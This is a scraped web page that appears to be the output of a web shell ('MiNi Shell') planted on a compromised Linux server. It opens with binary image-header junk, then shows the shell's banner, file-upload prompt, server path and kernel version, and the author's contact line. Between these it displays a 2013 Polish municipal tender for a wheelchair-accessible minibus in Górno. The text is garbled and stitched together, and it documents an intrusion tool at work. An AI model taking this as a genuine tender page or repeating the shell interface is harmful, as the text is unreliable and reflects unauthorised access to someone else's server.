JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130212/22491-N-2013.html

<p class="kh_header"><b>Górno: Dostawa mikrobusu do przewozu osób niepełnosprawnych przystosowanego do przewozu osób na wózkach inwalidzkich</b><br>
<b>Numer ogłoszenia: 22491 - 2013; data zamieszczenia: 12.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Górno , Górno 169, 26-008 Górno, woj. świętokrzyskie, tel. 041 3023018, faks 041 3023009.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mikrobusu do przewozu osób niepełnosprawnych przystosowanego do przewozu osób na wózkach inwalidzkich.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia:  
Dostawa 1 sztuki fabrycznie nowego mikrobusu 9 osobowego (8+1) do przewozu osób niepełnosprawnych przystosowanego do przewozu osób na wózkach inwalidzkich dla Gminy Górno. Zakup samochodu jest częściowo finansowany ze środków PFRON. Samochód musi być fabrycznie nowy, nie poddawany żadnym naprawom, pochodzić z produkcji w 2013 r. oraz winien spełniać obowiązujące w Polsce wymagania wynikające z ustawy z dnia 20 czerwca 1997 r. - Prawo o ruchu drogowym oraz rozporządzeń wykonawczych do tej ustawy. Winien również posiadać komplet dokumentów wymaganych do rejestracji. Samochód powinien mieć fabryczną homologację auta 9-cio osobowego. 

2. Wymagane parametry techniczne samochodu osobowego :
Wymagane minimalne parametry techniczne i użytkowe 
1. samochód osobowy, nowy, fabrycznie 9 osobowy (8+1) - razem z kierowcą, typu mikrobus, 
2. homologacja fabryczna dla samochodu 9-cio osobowego, 
3. rok produkcji 2013, 
4. rozstaw osi min. 3400 mm, 
5. max. długość samochodu 5500 mm,
6. dopuszczalna masa całkowita nie przekraczająca 3,5 tony
7. typ silnika - diesel, turbodoładowany z bezpośrednim wtryskiem paliwa, o pojemności do 2000 cm3  i  mocy min. 100 KM, spełniający normę emisji spalin EURO5
8. zużycie paliwa w cyklu mieszanym - max. 8,5 l/100 km
9. zużycie energii w cyklu mieszanym - max. 3,06 MJ/km, (iloczyn zużycia paliwa w cyklu mieszanym l/km i wartości energetycznej paliwa równej 36MJ/l)
10. emisja CO2 w cyklu mieszanym - max. 200g/km,
11. emisja zanieczyszczeń spełniająca wymogi Dyrektywy CEE EURO 5/2007/715/EC. Max. poziom tych emisji to :
- tlenku węgla CO - 0,5 g/km,
- węglowodorów HC - 0,05 g/km,
- tlenków azotu NOx - 0,18 g/km,
- cząstek stałych PM - 0,005 g/km
12. skrzynia biegów manualna 5 lub 6 biegowa (5 biegów + wsteczny), dźwignia zmiany biegów w formie joysticka,
13. układ hamulcowy tarczowy, hamulce wentylowane z przodu i z tyłu,
14. ABS - system zapobiegający blokowaniu kół podczas hamowania,
15. elektroniczna blokada mechanizmu różnicowego (EDS lub równoważna)
16. system zapobiegający utracie przyczepności
kół podczas przyśpieszania,
17. system zapobiegający poślizgowi kół napędzanych podczas hamowania silnikiem,
18. napęd kół przedni lub tylni z elektronicznym systemem stabilizacji toru jazdy z asystentem hamowania (ESP)
19. elektrycznie regulowane, ogrzewane lusterka boczne,
20. elektrycznie otwierane szyby boczne w przedziale kierowcy,
21. dwa komplety kluczy (z pilotem, jeśli dotyczy)
22. centralny zamek sterowany pilotem. Możliwość ryglowania zamków przez kierowcę od wewnątrz.
23. wspomaganie układu kierowniczego,
24. kolumna kierownicy regulowana w dwóch płaszczyznach z blokadą koła kierownicy
25. poduszka powietrzna dla kierowcy i pasażera 
(w przedziale kierowcy),
26. uchwyt wejściowy na słupku po prawej stronie w przestrzeni pasażerskiej,
27. klimatyzacja minimum półautomatyczna z regulacją i nawiewem w przedziale kierowcy oraz minimum przewietrzaniem przestrzeni pasażerskiej (nadmuch na I i II rząd siedzeń przestrzeni pasażerskiej),
28. ogrzewanie przestrzeni pasażerskiej - drugi wymiennik ciepła,
29. drzwi boczne do przestrzeni pasażerskiej przeszklone przesuwane z prawej strony,
30. blokada mechaniczna w klamce zamka drzwi przesuwnych, umożliwiająca ich łatwe zamykanie (po odblokowaniu klamką),
31. drzwi tylne przeszklone, dwuskrzydłowe (w przypadku montażu wózków w tylnej części pojazdu) lub klapa tylna z ogrzewaną szybą + wycieraczka,
32. radioodtwarzacz CD/MP3 + minimum 2 głośniki,
33. pełne przeszklenie samochodu,
34. czujnik parkowania w tylnym zderzaku,
35. tylne światła przeciwmgielne i wsteczne
36. trzecie (tylne) światło stop,
37. kierunkowskazy ostrzegawcze zamontowane na dachu z tyłu pojazdu
38. światła do jazdy dziennej włączane automatycznie,
39. autoalarm fabryczny,
40. immobiliser,
41. dywaniki w kabinie kierowcy
42. fotel kierowcy z regulacją wysokości i manualną regulacją podparcia odcinka lędźwiowego + podłokietniki,
43. rolety przeciwsłoneczne w bocznych oknach lub szyby przyciemniane w części pasażerskiej,
44. minimum jedno okno przesuwne w przestrzeni pasażerskiej (I rząd siedzeń),
45. siedzenie pasażera (2 osoby) w przedziale kierowcy w dowolnym układzie,
46. I i II rząd siedzeń w przestrzeni pasażerskiej - układ dowolny . Łatwy demontaż siedzeń,
47. atestowane mocowanie dla 1 wózka inwalidzkiego oraz pasy zabezpieczające osobę na wózku inwalidzkim, wózek montowany zamiennie maksymalnie za 2 miejsca siedzące, szerokość rozstawu kół wózków jakie będą przewożone w parametrach do max 70 cm.
48. atestowane najazdy wprowadzające wózek do pojazdu z powierzchnia antypoślizgową, łatwe w montażu i demontażu przez jedną osobę
49. antypoślizgowe progi przy stopniach wejściowych
50. tapicerka łatwa w utrzymaniu - odporna na zużycie i zabrudzenia
51. podłoga w kabinie pasażerskiej antypoślizgowa, wodoodporna
52. wysokość oparć I i II rzędu siedzeń w przestrzeni pasażerskiej, nie wyższa niż wysokość oparć foteli w przedziale kierowcy,
53. fotele wyposażone w zagłówki o regulowanej wysokości i trzypunktowe pasy bezpieczeństwa
54. komfortowe wykończenie wnętrza - bezpieczna przestrzeń pasażerska (bez ostrych krawędzi),
55. minimum jedno mocowanie Isofix w przestrzeni pasażerskiej,
56. podłoga płaska w przestrzeni pasażerskiej
57. podłoga wyłożona wykładziną zmywalną - antypoślizgową,
58. czujnik kontroli zapięcia pasów bezpieczeństwa kierowcy,
59. dwa komplety kół na felgach stalowych z oponami letnimi i zimowymi - średnica zalecana przez producenta. Opony fabrycznie nowe, nie starsze niż 6 m-cy. Koła wyposażone w kołpaki w pełni zakrywające felgi. W dniu odbioru zamontowane mają zostać opony odpowiednie do panujących warunków drogowych 
60. gaśnica dostosowana do pojazdu
61. trójkąt ostrzegawczy,
62. apteczka,
63. komplet narzędzi: podnośnik, klucz do kół, linka holownicza, wybijak szyb ewakuacyjnych
64. zamontowany hak holowniczy
65. pełnowymiarowe koło zapasowe
66. gwarancja minimum :
- mechaniczna (na zespoły i podzespoły mechaniczne / elektryczne / elektroniczne) 2 lata bez limitu kilometrów,
- 3 lata na lakier,
- 10 lat na perforację.
- 2 lata na wykonaną zabudowę dostosowującą do przewozu osób niepełnosprawnych
67. kolor nadwozia: metaliczny lub niemetaliczny szary/czerwony/zielony
68. plansze magnetyczne nakładane na nadwozie samochodu z symbolami o przewozie osób niepełnosprawnych zgodnie z art. 58 ustawy z dnia 20 czerwca 1997 r. Prawo o ruchu drogowym (DZ. U. z 2012 r. poz. 1137 z późn. zm.)
69. serwis w autoryzowanej stacji obsługi w odległości do 100 km od siedziby Zamawiającego
70. instrukcja w języku polskim
71. książka gwarancyjna wraz ze szczegółowymi warunkami gwarancji i serwisu oraz książka przeglądów serwisowych
72. karta pojazdu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.11.52.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 40.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków oceny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków oceny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków oceny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków oceny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych warunków oceny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.1) Formularz ofertowy - wypełniony i podpisany przez Wykonawcę (Zał. Nr 2)
A.2) Dokument potwierdzający posiadanie uprawnień / pełnomocnictw osób składających ofertę, o ile nie wynika to z przedstawionych dokumentów rejestrowych.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Postanowienia umowy zawarto we wzorze umowy, który stanowi załącznik numer 1 do SIWZ.
2. Zmiana postanowień umowy może być dokonana przez obie strony w formie pisemnej w formie aneksu pod rygorem nieważności.
3. Zamawiający dopuszcza możliwość wprowadzenia pisemnych zmian umowy z Wykonawcą na podstawie art. 144 ust. 1 Ustawy PZP przy wystąpieniu następujących okoliczności:
3.1. Zmiana terminu umownego (pkt IV SIWZ): 
wstrzymania świadczenia dostawy lub przerw w pracach powstałych z przyczyn leżących po stronie Zamawiającego,
działania siły wyższej, za które uważa się zdarzenia o charakterze nadzwyczajnym, które wystąpią po zawarciu umowy, a których strony nie były w stanie przewidzieć w momencie jej zawarcia i których zaistnienie lub skutki uniemożliwiają wykonanie przedmiotu umowy w sposób należyty,
istotnej zmiany zakresu świadczenia Wykonawcy stwierdzonej w formie pismnej, która powoduje konieczność zmiany terminu zakończenia wykonania przedmiotu umowy.
4) zmiana niewymagająca aneksowania umowy a jedynie pisemnej zgody / akceptacji Zamawiającego:
- zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w SIWZ,
- zmiana danych adresowych stron umowy,
- zmiana rachunku bankowego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gorno.biuletyn.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Górno, Górno 169, 26-008 Górno, Pokój nr 16 (I piętro).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.02.2013 godzina 08:00, miejsce: Urząd Gminy Górno, Górno 169, 26-008 Górno, Sekretariat (I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zakup współfinansowany ze środków PFRON w ramach Programu wyrównywania różnic między regionami II w obszarze D.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com